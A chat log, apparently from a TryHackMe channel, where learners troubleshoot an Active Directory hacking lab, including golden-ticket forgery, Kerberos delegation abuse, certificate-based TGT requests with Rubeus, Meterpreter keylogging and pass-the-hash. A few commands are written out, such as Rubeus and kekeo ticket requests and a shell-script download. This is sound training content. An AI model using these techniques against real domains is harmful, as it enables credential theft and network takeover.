#exploiting-ad

I went with the manual method simply due to latency, my remote shell was super delayed at times like it had too many processes trying to start. My background as a systems engineer really comes in handy at times like this.

Really good to know, were you using a meterpreter session as the shell or a something else? I've been fairly lucky with the THM labs and shell latency, but I've run into it before and it can bring things to a crawl. Curious if high latency could be avoided more by changing the type of shell or by changing the protocol.

I tried both and was having the same result both times. I think my room may have just been busy and had a bunch of people hammering it at the same time.

I can't tell if I broke the 10.200.83 network or someone else did. But I lost connection after using evil-winrm and my ssh connection dropped. It's been 15 minutes since refreshing the page and I can't access the network anymore.

People are trolls deleting mimikatz

Definitely helped a lot. Had the same issue on a different network

Yeah I had a lot of issues with people deleting things as I was working. Sorry you dealt with that.

I have questions about task 2, it says the domain users are misconfigured and they are able to add themselves to IT Support because they have AddMembers but I see they have GenericWrite over IT Support. Where it shows AddMember?

GenericWrite means that you can write to any attribute for the IT Support AD Object. One of those attributes to write to, would be the Member attribute, which is why you can add a member to the group

There are other ways you can exploit this misconfiguration, but the AddMember option is one of the easiest and least disruptive methods to exploit it, which is why it is showcased

Thanks for the info

Gave +1 Rep to @glacial stream

Is anyone able to use exploitad network? Looks like it is down even tho it shows running

It was fine but suddenly lost all ssh connections

hi

Is the vpn working?

Hello, I am currently on Exploiting Kerberos Delegation and I see this text "If you were to perform proper post-exploitation enumeration of THMWRK1, you would find that there is a service on the host running as the svcIIS user." I'm wondering what kind of enumeration techniques can be used to find a service like this?

Quite a number of tools can help you here.

You could go the manual route and enumerate:

• Processes
• Services
• SCH Tasks

You could use enumeration tools like WinPeas or SeatBelt

Local host enumeration is an entire different area of security. So something to look into more!

Really good module to look into if you are interested in this portion: https://tryhackme.com/module/post-compromise

Thanks alot, i will look into it

Gave +1 Rep to @glacial stream

for network services 2, when I mount the nfs share, the Cappucino directory is empty.......and the questions indicate it's supposed to have files....can anyone help or assist?

Hi! I'm stuck at task 5: I got a meterpreter shell but it looks like trevor hasn't opened explorer 😛

Should the net need a reset?

Please check the pinned messages for starting the service yourself

Ok done, but how long have I to wait to get a key dump? me impatient 😛

Hello i was working on this network but i cannot access anynomre via RDP or SHH at the THMWRK1 😥

guys i don't understand 17462.txt on exploitdb and when i run the binary it gives "you're not allowed, go away!" or something

I have been waiting for 15 minutes after adding my initial user into IT support group. So I still can't change pass to Tier 2 admin
No permissions
I tried gpupdate /force and reconnect via ssh, still not working

After 30 minutes it works

Ad works in mysterious ways

I can't get password from KeePass, no session on THMSERVER1

What i do wrong?

Nothing, the user account has expired. So change the server admin pass and rdp in. Set account to never expire and remove change password on next logon

run the powershell in pinned chat with THMSERVER1 and restart server

@fiery nexus check it now if your online while its working or reproduce the steps mentioned

Hi guys

I successfully created and cached the HTTP and WSMAN service tickets with imports confirmed when I check klist.

I'm having an issue with the New-PSSession -ComputerName thmserver1.za.tryhackme.loc command. I get the following error message

New-PSSession : [THMSERVER1.za.tryhackme.loc] Connecting to remote server THMSERVER1.za.tryhackme.loc failed with the following error message : WinRM cannot process the request. The following error with errorcode 0x8009030e occurred while using Kerberos authentication: A specified logon session does not exist. It may already have been terminated.

I've tried letting the timer for the network run out and start it up again with no success. Any suggestions with getting WinRM started? Thanks all!

There is no process called explorer.exe mentioned in the "Exploiting AD Users" task. I am on a meterpreter on thmserver1.za.tryhackme.loc as system

someone else facing the same issue?

reset is at 1/5 sadly

nvm, checked the pin

I have this ticket in cache, but can stll not access \thmrootdc.tryhackme.loc\c$ Any ideas why?

nor am I able to do winrs.exe -r:thmrootdc.tryhackme.loc cmd.exe to get a shell

I made the ticket using this

in fact, after submitting that ticket in the session of an admin user on THMSERVER2, I can't even pop a shell on THMDC.ZA.TRYHACKME.LOC via winrs.exe -r:THMDC.ZA.TRYHACKME.LOC cmd.exe

I put the NTLM hash of krbtgt in /rc4: btw, in case that makes it wrong

If the ticket ccache format it should be used on linux with impacket or similar tools it needs to in kirbi format to be used on windows

I did not export the ticket. I have used the /ptt flag to inject it into session

I am think I got the rc4 wrong. I put ntlm of krbtgt there, I wonder if something else was supposed to be there.

Did you use token::elevate with mimikatz before creating the ticket?!

I dont remember, I think I did not.

Doesnt it not matter if we used token::elevate or even privilege::debug while creating tickets since we have all the required credentials?

It does if you use token elevate it will inject the ticket into wrong context thats why i asked

I mean, this worked for a normal golden ticket too, but I dont know what the issue is while doing it for enterprise admins and the forest root

Oh, i understand

I'll actually try this once more today since the lab has been reset. Hopefully I figure it out.

The way i did it was with impacket's ticketer.py may be give it a shot and see how it turns out

Okay , will try. Thanks 👍🏻

Okay, I did it again, this time it worked. The Reset was fresh so I guess there was some role of that.

But I had one Question in mind. If one is a Domain Admin of za.tryhackme.loc, then why do I need to build an attack to access the Parent DC? (okay, here is what I gathered from the Internet, DA of za.tryhackme.loc is not DA of tryhackme.loc)

Also, how can the Domain Trusts Vulnerability in question here, be prevented?

If you control the parent DC, then you control all child domains. So you compromised za.tryhackme.loc and used that to fully compromise tryhackme.loc as well. This means you would now be in full control of uk.tryhackme.loc and us.tryhackme.loc as well for example. That's why you aim to compromise the parent domain as well. Also in the parent domain it is not longer Domain Admin, it is Enterprise Admin, as in admin over the entire Enterprise. Even more privileged than DA.

It can't. It is intended functionality. So it isn't really a vulnerability. It is simply a fact that there is bidirectional trust and we have compromised one of the domains in this trust relationship. But it has to be trusted, which is why it is intended functionality. That's why you should always take good care of your CHILD domains as well to make sure they are not compromised. There are detection techniques for this, but at that point it is a bit too late as the entire child domain has been compromised.

It sure seems like a vulnerability if I can use a domain admin account to always get enterprise admin access(for bidirectional trust). I know a lot of active directory is "intended functionality" though heh.

If bidiectional trust is defult then even more so

Also, i love your network labs btw.

So I think there is a missing step here. No DA has the ability to "just become an EA". The truth is, any DA has the ability to perform the malicious action of dumping the NTLM hash of the KRBTGT account and then leverage this hash to forge a malicious ticket.

In the same vein, any DA has the ability to delete the entire domain structure. Is that a vulnerability? Not really, just intended functionality being used for something incredibly bad, which is why you want to make sure to protect something like DA access.

I know it feels bad, but the fact is, somewhere something has to have access in order to work. Thus, we need to protect it, cause access to it will end really badly.

Also, we can build detections for this misuse to help us respond to it. It's not perfect, but we won't be able to really remove the true power that "admin" will have.

Hope that helps a bit?

Glad you are liking them!

Yeah, the DA being able to forge that ticket is what I was implicitly talking about. I do get what you mean. I initially thought the DA would be like an unprivileged user to the parent domain. But it seems thats not the case.

Yeah that's correct, the DA is not a user in the parent domain. We are leveraging the KRBTGT hash to forge a ticket.

This entire progress gets even more whacky in domain trusts that are not parent<->child configuration. Inter-realm tickets are a magical thing to explore if you have some time!

Evil-WinRM fails to connect to THMSERVER1, and I can't ping THMSERVER1 either. Does the network need resetting? @glacial stream

Probably yes. Check the pinned messages for what you can do for debug purposes. If that's the case will have to vote reset

Thank you. Been through the pins. I'm the only on the server, so I'm slowly waiting every hour to vote.

Gave +1 Rep to @glacial stream

Sorry about that, sadly I can't admin reset anything here

No worries 🙂 I'll do some other study in the meantime

Thanks again for the support.

autologin.ps1 or auto-login.ps1 ? ✌️

May need that pinned message updating if I'm looking at the right server 😄

C:\autologin.ps1 trevor.local <chosen password> THNSERVER1

should be

C:\autologin.ps1 trevor.local <chosen password> THMSERVER1 (typo with an N in THM)

Should be fixed thanks!

Gave +1 Rep to @steel plaza

Anyone else having any issues in Task 5 - Exploiting AD Users, I got a shell and everything, but I don't have any process running with THMSERVER1\trevor.local when I issue the command ps | grep "explorer" in the meterpreter shell, I think the network might need a simple reset though... can anyone vote for the reset on the network as well?

Nevermind, I just read the room comment, all good

This is why you ask for help, because every time you do... you will just figure out shortly afterwards

Glad you got it sorted! My suggestion is to always check the pinned messages. 99% of the time a fix for problems are already mentioned there

"Exploiting kerberos delegation" giving me this error

Has anyone got a solution for this?.

Nevermind I fixed it lol

Does anyone have a fix for the keyscan_dump not working?

I've started the explorer process manually, and I've also followed the steps on the pinned message

I can migrate

and I am indeed running keyscan_start as trevor.local

But its been 25 minutes and no credentials yet

how much time does this take usually?

to "replicate' my permissions on the network

ran gpupdate 5 times probably and waited around 20 mins

still nothing

• ive done everything before this right, checked 3-4 times

Hello. I'm on task 7, and while attempting to run Rubeus, I receive the following error when trying to run asktgt:

KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP

Can someone please help with this?

Thank you.

Can you verify yourself and then post an image of the error here including all previous commands?

This is the Rubeus command and the output.

I also attempted the request with the /noask as well as /pkinit_etype:aes128_cts_hmac_sha1 options. I receive the same error regardless.

I have also reset the lab and started from scratch, thinking perhaps something went wrong with the DC, but this also didn't fix my error.

Can you please send me your VPN IP? So in your VPN file, look for that internet IP that your VPN is connecting to and then I can check for you quickly

Seems like the CERT has expired for Kerberos authentication and for some reason did not renew. I can fix it for individual networks if you send me your VPN IP. Will get the team to deploy a patch

New one up and running in the 10.200.63.X subnet

My VPN IP is: 10.50.98.6

That is your personal VPN IP. I'm looking for the internet IP you can find in your VPN file, the OVPN file

Ah.

Like where your VPN is actually connecting to

Stand by.

In the .ovpn file I have remote 54.155.75.117. Is that what you are looking for?

Indeed, couple seconds please

Thank you.

New certificates are enrolled. Your rubeus command should work now. Note this fix will only work until the network is reset until we deploy the full patch

w00t! It worked! Thank you so much for that.

Gave +1 Rep to @glacial stream

Hi, I'm having trouble with the last task of exploiting-ad, I've created and exported the certificate exactly as instructed but I'm used to get the error - "KDC_ERR_PADATA_TYPE_NOSUPP"
But now I'm getting the following when trying to execute rubeus.exe:

Hey there, please see the messages above on that error. We have now deployed the patch so if you vote reset for the network the patch will take effect. Not sure what is happening with Rubues though. On which host in the network is that?

Thanks, I believe it was on THMSERVER2.

Gave +1 Rep to @glacial stream

I think a network reset should solve the issue. No updates were made to Rubeus so it should be working as is with the server version

👍

Hi, I'm not able to reset the password of t2 admin user in task 2. Somehow, I do not have sufficient permissions. But I added previously my user to the "IT Support" group and also enforced gpupdate.

Am I missing something?

Ugh a network reset right as I was getting flag 😂😅🥲

Ha, fun times. 😄

Awesome network! 🎉🎊🍾

+rep @glacial stream

Gave +1 Rep to @glacial stream

Hi everyone!
I have trouble exploiting ad room. In task2 There is screenshot about force change password option in It Support group. But I can not find it using bloodhound. I captured screen video

I mean I know IT support has force change password according to Task 2. But where I can find it?

Sometimes when you execute bloodhound using low-privileged credentials (or the wrong execution flags for that matter), you won't be able to discover all information, which then hides certain attack paths. That's why the BH data was given here as a taskfile as well. However, given that this "force change password" permission is configured within the normal AD structure, using the correct execution flags for BH should find the path for you. But again, some weirdness can happen with low privileged AD creds

Oh I never knew that. I executed bloodhound in my linux, because it is easier to download file and run, because attackbox is lagging and I couldn't connect via vpn

Does anyone using exploitad now? It is not working. Maybe someone can help in resetting?

Should this be THMWRK1?

I'm getting errors adding a member to the IT Support group as described by the task on THMWRK1. Looking into it more.
Worked on another powershell session.
Works only with "huge.jones" (which I think already exists). Doesn't work with a completely new user.
Worked after spamming the command a few times.

Anyone issues with ExploitAD Room?

What sort of issues?

Hi, I'm encountering an issue with my Kali box. It cannot resolve the domain name thmserver2.za.tryhackme.loc.

Troubleshooting steps taken so far:

Followed the instructions in the room:
a) Changed the DNS server to THMChildDC IP.
b) Restarted the network interface.
c) Tried nslookup, but it didn't work.

Attempted to change the DNS server using nmtui and removed the public DNS (e.g., 1.1.1.1) so that only the THMChildDC IP remained. However, both steps didn't work.

Restarted both my PC and the laboratory.

Regenerated the VPN profile.

As a sanity check, I tried the same room instructions on other rooms (breaching AD, Enumerating AD, and lateral movement) and didn't encounter any problems.

In the exploiting AD room/lab under exploiting GPO's and when I use CMD runas as user t1_trevor jones and the password it says username or password incorect when I try to check the dir \za.tryhackme.loc\sysvol path need help

Is this normal?

THMDC seems to be down

unless we are supposed to use THMCHILDDC

At this point you are

You don't have access to the rootdc yet

Ah, makes sense

Thank you @silent swallow

Gave +1 Rep to @silent swallow

You're welcome 🙂

I've been having this issue the past couple of days where the room will time-out, so I go to start it back up but DNS no longer seems to resolve. Anyone else have this issue?

A full network reset seems to resolve it, but of course I have to wait for 5 votes

is the network down, cant reach it anymore :/

I have a question regarding the following part:

Why can I only do it with a low privilege user from THMWRK1? I tried getting the information with a t2 and t1 admin and neither worked.

I get the following error in that case:

Got another problem:

I'm 100% sure that I have a golden ticket and should be able to get to the rootdc, but it says, that it doesn't exist

I can only look for "thmdc"

"thmchilddc" also doesn't exist when trying it, even though both should be ther

nevermind, I'm dumb

Since it's the root-DC, the "za" has to be removed...

guys help i am at expoit ad
but when i try to get a meterperter shell it only downloads file in archive mode
and i tried icacls to change the mode
but it remains a

done

guys, cant rdp into thmserver2

connection reset by peer

Can someone vote to reset this network? It doesn't seem to be working at the moment. I just need one more vote. 🙂

You need to state your subnet.

I didn't realize. Thanks! It is 10.200.98.0/24 with the DC being: 10.200.98.101

has anyone had issues with getting the password using keyscan_dump. I migrated the process to an explorer process with trevor.local. However, keyscan_dump returns nothing. Am I missing a step here?

guess that is one of the later tasks

This is for the exploiting AD users section

I can follow everything up until this point

ah yeah shadow has not got that far yet... so can't really help

only completed the first 3 tasks....

ah ok, no worries. Let me know if you have any luck with it

thanks... but taking a break until tomorrow afternoon

hope you can figure it out or get it working before then

Hi, just wanted to see if anyone was aware that the DC in this room is unreachable?
I was trying via VM, but loading attackbox now to show the pings to 10.200.98.101 is not working

root@ip-10-10-49-8:~# ping -c 3 10.200.98.101
PING 10.200.98.101 (10.200.98.101) 56(84) bytes of data.
From 10.50.95.1 icmp_seq=1 Destination Host Unreachable
From 10.50.95.1 icmp_seq=2 Destination Host Unreachable
From 10.50.95.1 icmp_seq=3 Destination Host Unreachable

--- 10.200.98.101 ping statistics ---
3 packets transmitted, 0 received, +3 errors, 100% packet loss, time 2051ms
pipe 3
root@ip-10-10-49-8:~# route | grep 10.200.98
10.200.98.0     ip-10-50-95-1.e 255.255.255.0   UG    1000   0        0 exploitad

Hi, all,

I need some help regarding room "Exploiting Active Directory" task 7. There I want to create a TGT using Rubeus but I always get an error message saying "No answer from domain controller":

`C:\Users\phillip.wilkins\Downloads>\Tools\Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:FakeCert-pass123.pfx /password:pass /outfile:Administrator.kirbi /domain:za.tryhackme.loc /dc:10.20.120.101

(_____ \ | |
) ) | | _____ _ _ ___
| __ /| | | | _ | ___ | | | |/)
| | \ | || | |) ) | || | |
|| ||/|/|_____)_/(/

v2.0.0

[*] Action: Ask TGT

[] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=FakeCert
[] Building AS-REQ (w/ PKINIT preauth) for: 'za.tryhackme.loc\Administrator'
[X] Error connecting to 10.20.120.101:88 : A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond 10.20.120.101:88

[X] No answer from domain controller`

Any ideas how to find the issue?

Nevermind, typing IP addresses is somehow difficult 😦

Currently bricked out of this network. Does the "reset network" option just legitimately not work?

Even if I vote as the hammer vote the "reset" doesn't seem to correct the problem

Had this problem in the lateral movement room as well, only "resolved" it by waiting a couple of days until the network worked. Someone suggested "leaving" the room but that didn't work for me here.

My current domain controller is 100.200.98.101

what specifically are you doing that makes you think it is broken

and yes the reset option should work

I cannot reach the domain controller at all

Or any of the other servers in the network

via attackbox

ping to the DC, SSH or RDP to the jump system (THMWRK1)

all fail

doh

Also just reset the room (I was the 3rd vote) and after it finished resetting, this is what it shows (even after a refresh)

windows machines do not respond to normal ping commands

The domain controllers in these rooms definitely respond to ping

I was working on this one yesterday (first task) and the domain controller responded to ping fine

!vpnscript

have you tried using this to troublehsoot your vpn connection as that could have been part of the problem

I'm using the Attackbox, not VPN

did you forget to run the setup commands in task 1 again after you started today???

nope

Configured DNS as requested

the image you showed also shows the network only had 7 mins left to run so it could have stopped itself

systemd-resolve --interface exploitad --set-dns 10.200.98.101 --set-domain za.tryhackme.loc

Why would it stop itself immediately after I initiated a reset?

good question but dunno

Even if that is the case (I'm going to just let it expire, don't see why I would let it keep going), that's a problem on its own lol

@glacial stream is this something to look into????

I'll also just repeat that I had this exact same problem in the lateral movement room, only thing that got it working was me waiting a couple days and trying again

Including how the "reset" hammer vote doesn't seem to really do anything

it meeping should which is making it weird to shadow how it could possibly be broken

the network reset and time for the machine to spin up again can take around 5-10 mins though

I've tried a few times (both in this room and the other one) post-reset and experienced the same result actually

Usually just sets the counter back to what it was and the hosts are still unreachable

@topaz ore if you want support on this, can you please follow the steps in the pinned messages and report back the findings. Also, even if you are on the AttackBox, you will have a VPN connection to the network, the attackbox just does it automatically for you. If you don't see the VPN connection in the attack box, my suggestion would be to reset your VPN profile, stop the attackbox, then reboot it again

@glacial stream which pinned messages?

They are pinned in each of the channels of the networks I created. Only one I did not do was the Lateral Movement one

Understood, thanks! I'll look into it probably later this evening

Hi, I have a question regarding "These credentials can now be used to get a shell on the host!" in Task 4. Once we get the password from hashdump, how can we use it to get a shell? I tried SSH directly from my attack machine, but it was denied by server1.

Hi @glacial stream - After reviewing the pinned messages, it looks like the situation matches the "bricked network" description. But again, even if I hammer the last vote of the reset, the network doesn't exit the "bricked" mode

As mentioned in the pinned messages: "The best thing to do is to wait until the network time expires, then press the "Start" button again.". If you hit reset, you are trying to reset something that isn't active, so it can't be reset. A reset won't fix the issue, the timer expiring will.

If you truly believe that you are in a network with an issue, you can send the subnet here and I will investigate. It the mean time you can leave the room, wait an hour, and then rejoin and it should place you in a different subnet.

Have you completed the lateral movement and pivoting room? Which is the one before this and details several methods that you can use credentials to access the host

Thank you so much for your reply. Now I successfully logged in with the evil-winrm tool.

Gave +1 Rep to @glacial stream

no need to wait an hour... about 15 mins is enough for it to nearly garantue a different subnet

meeps shadow got away with just waiting 3 mins to play subnet roulette to get a new subnet

Btw, one thing that has always bothered me and I do not seem to find an answer to this: The latest releases of BloodHound and SharpHound are incompatible with each other

Or am I making something wrong here?

The JSONs created by the latest SharpHound have the version 5

The latest BloodHound release is version 4

And also when importing the SharpHound JSONs in BloodHound you get an error

hmm

This does happen sometimes. Which is why it usually helps to keep your versions in sync with what works. I usually use both in a couple versions previous until I know the new ones are stable

having this exact issue on another room. the json file is fine, grabbed it twice to be sure, but the file wont open

Hi, I've been having some trouble making a reverse shell on the networkservices room https://tryhackme.com/room/networkservices i don't get any respose from it, am I missing something?

In Exploiting Telnet, Task 7

I perform the ping and leave it open the i generate the payload and run it on the telnet server but i dont see any response on the nc listener

What command are you using? Uploading your code or screenshot would definitely help!

Hello everyone. I'm having problems with the "Exploiting Active Directory" room. For some reason I can't reach the DC. I added the DC ip in "additional DNS Servers" as usual, but it didn't work. To test if the problem was my Kali, I used the "Lateral Movement" room lab, and it work out fine doing the same steps. Does someone have the same problem?

On the pinned messages you can find the command, what happens when you run and nslookup specifying the DC IP as the name server? So command number 1 and 2?

same issue here (since yesterday) : the target network is unreachable from both Attakbox and embedded Kali.
It's not a DNS misconfiguration, since the DC is not reachable even with it's IP:

$ ping 10.200.77.101
PING 10.200.77.101 (10.200.77.101) 56(84) bytes of data.
From 10.50.69.1 icmp_seq=1 Destination Host Unreachable
From 10.50.69.1 icmp_seq=2 Destination Host Unreachable
From 10.50.69.1 icmp_seq=3 Destination Host Unreachable

I tried the "unbricking" trick, tried to reset it several times, but nothing works.

From 10.50.69.1 icmp_seq=1 Destination Host Unreachable - Means the network is not running. Will ask them to investigate, but a simple Start should put the network in the start mode

Network has been hard reset, should be ready to go

I confirm that it's back and reachable now. Thanks for the reset. 👍

Gave +1 Rep to @glacial stream

can't connect to http://distributor.za.tryhackme.loc/creds

pls help

i did systemd-resolve --interface exploitad --set-dns 10.200.98.101 --set-domain za.tryhackme.loc

but the problem IS the dns

nslookup thmdc.za.tryhackme.loc doesn't work

Are you using the attackbox or you own machine?

Attack box

Can you send the output from the steps listed in the pinned messages so we can isolate the problem?

ok, thank u, let me try

the ping seems not to work, but THM says that the machine is online

it is continuing

should i stop it?

If you don't reply to the message, I don't get a notification for it. That says the network is not active. Wait until the network time runs out and then restart it

Sorry! Btw thanks, I’ll try

i followed the steps and resetted the machine but now this happens

am i doing something wrong?

check the pins for troubleshooting tips... think you might have a dud DC

i refreshed and i did the restart button thing

¯_(ツ)_/¯

thanks the same

thmwrk1 is not a nameserver. Only the DC is. So you are asking nslookup to try and resolve tryhackme.loc with thmwrk1 the DNS server. So that is not going to work at all

If you want to verify that dns is up and running on the DC, which is the DNS server, you would run nslookup tryhackme.loc 10.200.98.100. This tells nslookup to try and resolve tryhackme.loc and use 10.200.98.100 (which is the rootdc) as the nameserver

I'm doing the permission delegation task right at the bloodhound part, and with it I'm supposed to find the paths e.g. the connection between "domain users" and "tier 2 admins", by adding them as the starting and ending nodes, respectively. Hovewer I cannot add them; the buttons simply don't do anything.
What am I doing wrong?
Edit: retrying on another day worked, so there was a problem with the AttackBox on that day. No one tried to help me, that's discouraging...

has anyone cracked the password of the kdbx file in the Exploiting AD Users task ?

Please share how you were able to do it ?

Cause If we are supposed to get the password via keylogging, I cannot do that because I am not seeing the explorer.exe in the processes even after using the auto_login powershell script and restarting the server.

I have tried logging in via RDP, migrating to the process and starting keyscan. But even after 5-10 minutes, I am not seeing the password

Never Mind I got it

can't download file from python server

What are you trying?

python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

wget "http://10.10.92.17:8000/shell.ps1"

Invoke-Webrequest -URL "http://10.10.92.17:8000/shell.ps1" -OutputFile "shell.ps1"

ERROR:

A parameter cannot be found that matches parameter name 'URL'.

You're using https

use http.

am i not using http?

OOps. you are.

I was able to wget your file.

Can we move to #room-help

This channel is for the network.

And can you send a screenshot?

sure

i'm doing the exploiting certificates part

pls help

@glacial stream sorry if i @ u i don't know if i can, and i will not do it anymore if u tell me not to, but i guess this is a network problem(?), i saw a walkthrougt and it works differently

i saw the machine also restarted since i did it the first time and the problem still remains

On which machine are you trying to get the CERT?

Also, can you click "Show all templates" and just screenshot what the error is next to the certificate template?

thmserver2

they are all like that

i didn't followed all the steps to arrive here, i wasn't able to do it all in once so i used the fact that gpos are already exploited and entered like that

It is complain about permissions, are you doing it as the computer object or another account?

GPO is not needed for the certificate exploit, but only a specific account can request the certificate. If I remember correctly, it was the computer account. Did you select computer account for the certificate snap in?

i used the first account they gave me

That's not gonna work. You running MMC as admin to allow you to specify the computer account?

sorry, i didn't read it, my bad, thank u so much

thanks

Gave +1 Rep to @glacial stream

Hello, I see the network as "running" but can't nslookup, I already configured the dns with "systemd-resolve --interface exploitad --set-dns 10.200.63.101 --set-domain za.tryhackme.loc" I'm using the attackbox. Is there a problem with this network ?

nevermind it restarted

Hi. Have the same issue today as @fast saddle

2/4 votes for reset. Could anyone please vote to reset it?

is there something wrong with the network ? I even tried to use the attackbox did reset it yet nothing it is not responding to pings and I can't resolve the DC IP

exploiting and lateral movement both don't resolve DNS for me, pinging IPs directly works

the same

you can click reset , to reset the network

🤔 do the networks get windows updates regularly? the newest updates set windoes servers to prefer IPV6 which tends to break DNS resolution if no IPV6 zones have been set

network reset doesn't work for me either unfortunately

The network is not working for me. I can't reach it using the attack box

it's been an issue, vote for reset

Are you all on the same subnet?

Did you take a look at that: #exploiting-ad message

didn't know about the tryhackme.loc but pings stopped working too since yesterday

Did you then check this post: #exploiting-ad message

i'll do an extensive trouble shooting this evening

I don't think it's gona work! I;ve been trying to work on this lab for 3 days with no luck!

i am in subnet 10.50.61.0, the network i can connect to is 10.200.64.0

(i used the lateralmovement network but it's the same for exploiting ad)

traceroute stops at the gateway of the subnet

ping doesn't work

nslookup doesn't work either

Did you try the "network bricked mode state" pinned message too ?

i did now, let's see how it goes

problem is ongoing, i'll see if i can reset it

Could you also show me a screen of the network diagram in the room?

Okay, ye maybe try to reset the network

If that doesn't help, maybe leave the room, then join again and create a new vpn file

Make sure to also press regenerate before downloading the vpn file

oh ok leaving the room completely changed the network

Sounds already like some progress 😄

it does

alright i changed subnet

Looks like we are on the same subnet, ping works fine for me currently

works fine now

either the network or the subnet is borked atm

thanks for your help

Do you use lateralmovement vpn file??? not exploitad vpn file?

i had the same problem on both networks

which is why i used them interchangeably

Ok!

Hi everyone, I've done this lab but I have some questions left about it.
How can I find by myself the svcIIS account?
And did anyone run sharphound by themself? because I did it and I can't see the "AdminTo" relationship

Just sending here as well for anyone else that is interested:

So Sharphound enumerates permissions such as "AdminTo" by connecting remotely to the registry of each host. Of course if the account you use to run sharphound does not have the relevant permissions to read the registry, you will not be able to see this information. That's why usually as you get more privileged accounts (through compromises), you will rerun sharphound with these privileged accounts to get more insights and data.

That being said, there are ways you can find out that svcIIS has some permissions on that host. To do this, take a look at the SPNs set on both that host and the svcIIS account. These will tell you that svcIIS has delegation permissions on that host. Rather than relying on standard Bloodhound queries, you can write your own cypher query to get this data and enumerate it that way. Here's a link to some pretty powerful cypher queries: https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/

Thank you a lot!!!

🙏🙏🔥🔥🔥

Is this module working properly?

ain't getting response from THMWRK1, im stuck in part 2. Came across with the same problem yesterday with the Enumerating-AD module.

noooooooooooooooooooooooooooooooooo 😭

someone reset the network as i was almost done

ouchies that can hurt a lot

at least there are decent backups of progress for this network

the red team capstone challenge network was a huge hassle with the resets

Sheeeeesh this room has been nothing but trouble... The attack box randomly froze on me, now the servers are unreachable all of a sudden. I was just past where Ninzus was.

Hey guys, Suman here, I have been learning active directory for a while now, few mins ago I solved the https://tryhackme.com/room/attacktivedirectory Attacktive Directory room, I just have one question, when using pass the hash technique, I was able to get access to the administrator account, but using the same technique I was not able to get into the backup or svc-admin account, it was asking for the password if used impacket-psexec and throws an error in evil-winrm, but goes smoothly with Administrator account, why is that I was able to get into admin account but not the other non admin account?

Hi Guys i am trying to complete this task in Exploiting Active Directory Task 3, but i m getting an error. I already followed every steps 1 by 1 but still get the same error. I want to share the screenshot but cant paste the pic in here

Can you guys help me to solve this

You need to be in the same directory as the .kirbi file when you run those commands in mimikatz

i keep getting a timedout when i try to transfer a file onto the windows machine in exploiting AD task 5. How can i fix this? I have adminsitrator rights. I tried via webclient on powershell and certutil.exe

Can anyone help me?

host with python and curl url -o file.exe

is there anyone here that can help me with Task 6 of Exploiting AD? Bloodhound results arent showing me the management server GPO thing.

Also when i do the runas the svcservman i paste the correct password and get the cmd of the servman account

but when i start mmc.exe its empty, can some one help me?

@glacial stream

hello everyone, i am doing task 5 of the exploit AD room , and the proccess of explorer.exe for trevor.local is just not showing up , no matter what i tried , the steps given to do in this case do not work after the command shutdown -r the server just shuts down and is unreachable in till the network starts again ( i tried this for 2 new networks already) , any ideas? maybe how to start the proccess for the user in a other way?

Hi, is there any issue about the database.kdbx ? I have downloaded the one related to the local user as said, but there is no more flag in it..even if I see that it is a little heavier than two others

Am I doing something wrong ?

There is just the two samples, without any other entry

my bad, I forgot replacing the first file by the new one

All AD rooms are currently going through an update ive been told. So some machines could be a bit buggy!

suggest me appropriate linux for pentest which won't crash every other week and which is stable os

Just run kali in a VM and you should be fine, other popular options are Ubuntu or ParrotOS, but Kali is by far the most popular.

Kali

Or can use the attackboxs

Hey, I'm getting the same error. Can you retrace your steps? I created the TGT several times and I always got the error.

hey,is this room stuck in reseting ?

i can't start it

I keep getting this error, even after restarting the network

I could RDP for a while and do my thing

then I got kicked out and got this error

looks like you sent the intrerup with ctrl + c

It does, but I'm sure I haven't

I was clicking through the mmc of the target machine

maybe try remmina

The entire DNS broke right after

GG

Second time this happened ;-;

It just randomly happened earlier too

then I rebooted the network

after 15 minutes

it was back down and crashing

ouchies

yep yep, not a great time

Just think, everytime something doesnt work, its an experience gained.

Hi,
In Attacktive I can't john/hashcat the Kerberos hash of svc-admin.
I tried with the rockyou and personalized wordlist without success. Any idea ?
I looked on some writeup (and found management2005) and everyone does exactly like i did ...

Try using grep -n to see the line number of your wordlist

You can use that to calculate the amount of time it would take

i even created a file with only the good password and no success

Are you sure you have the right hash then?

, i did exactly like 5 writes up

even in videos

the hash change due to kerberos but the process is exactly same

This channels is the wrong channel for that help, this is for the Breaching AD room. @dark dust

I'm doing task 5 and I'm stuck coz I can open the keepass database but there's not flag or svcServMan, any idea? This is a bulls**t. I'm paying every month to waste my time coz there's not a n organization.

@magic furnace Spam

Can someone +1 to reset the "Exploiting AD Room": https://tryhackme.com/room/exploitingad. I was halfway through it but suddenly I am unable to even ping the DC

I keep having problems with this room with the network going to sleep while I'm working. I've been inside an RDP session and the connection just drops. Right now, same as you, can't ping DC

In the task3 task of Exploiting Active Directory room, after I used mimikatz's lsadump::secrets command, an ERROR kuhl_m_lsadump_secretsOrCache; kull_m_registry_RegOpenKeyEx (SECURITY) (0x00000005) error occurred. Can the staff reset the room?

you will need to vote, state your subnet

Hi the network state has been stuck at "resetting" for the past few days. Any ideas what I can do?

For the exploiting-ad room

You can leave the room and then wait a bit and rejoin, you will probably be assigned to a different subnet. You should also probably mention which subnet is bugged for you though so that staff can look into it if it has really been broken for so long as you say

Subnet is 10.200.47.0/24 (I'm assuming it's a /24?)

Hey guys!

ERROR kuhl_m_kerberos_ptt_file ; kull_m_file_
readData (0x00000002)

How to get rid of this error in TGS tickets part in Exploiting AD task 3? Im following all steps but still getting this issue. What could cause this error?

Commands im using:
In kekeo
For TGT
Tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:password

For TGS,
Tgs::s4u /tgt:ticket-name /user:t1_trevor.john /service:http/THMSERVER1.za.tryhackme.loc

Any help will be appreciated.

Guys the TGT and TGS files that are created can be found where?
I cant find it anywhere

Your password for svcIIS user is wrong here when creating TGT and you can only create a TGS only if you have a valid TGT. Also TGT & TGS will be strored in your Current Directory.

Even with correct password its giving error. And the files are not stored in current directory.

Cant find them

can you share a screenshot

In the Exploiting AD room Task 4 should i keep the privilege gained from Task 3 or can i only use the tier 2 admin account gained from task 2?

i tried with the t2_admin_acc

i keep getting this error and another diff. errors on the relay capture side

